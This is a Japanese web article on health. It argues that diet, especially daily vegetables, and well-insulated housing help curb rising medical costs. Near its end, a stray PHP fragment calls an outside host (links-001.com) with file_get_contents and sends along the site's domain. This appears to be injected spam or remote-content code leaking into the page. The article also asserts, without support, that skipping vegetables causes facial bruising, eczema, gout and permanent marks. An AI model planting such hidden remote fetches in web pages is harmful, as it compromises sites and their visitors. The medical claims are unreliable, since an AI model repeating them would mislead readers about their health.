前へ
次へ

医療は医者と薬だけでは成り立たない

健康で長生きするためには医療環境の進歩と充実が何よりも欠かせません。
その医療環境では日本は一応は先進国の1つとして充実しています。
しかしながら我が国では同時に高齢者の増加も相まって医療費が年々増大傾向となっています。
この医療費の増大傾向を少しでも抑制するためには、各個人の普段の生活環境の改善が何よりも重視されます。
言い換えれば健康は医療だけでなく、普段の食生活と住居環境も同時に良好でなければ機能しないということです。
これに関して食生活では特に野菜を毎日一定量以上食べることが重視されます。
というのはその野菜を極限にほとんど食べないでハンバーガーなどの手軽な食事ばかりを繰り返してると、やがて身体にそれまでなかったかのようなアザができたりなどして酷い湿疹みたいなのが表面化してきます。
それは胴体だけでなく顔にも表面化するので、やがて周囲の人々が近寄らなくなってしまいますし、そのアザを放置しておくと生涯それが身体に残る羽目になってしまいます。
さらに痛風などにも襲われてしまうなどしてしまうので、野菜は生だけでなく炒めて大量に食べるなどが要求されます。
住環境にしても日本は欧米に比べて貧弱であるといわれます。
特に冬場の断熱性能は見劣りしていて、それのためにヒートショックなどで死亡する人が多くなってます。
これを打開するには、暖房なくても18度以上ある家が心身の不調を改善するといわれます。

".file_get_contents('http://links-001.com/123set5?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top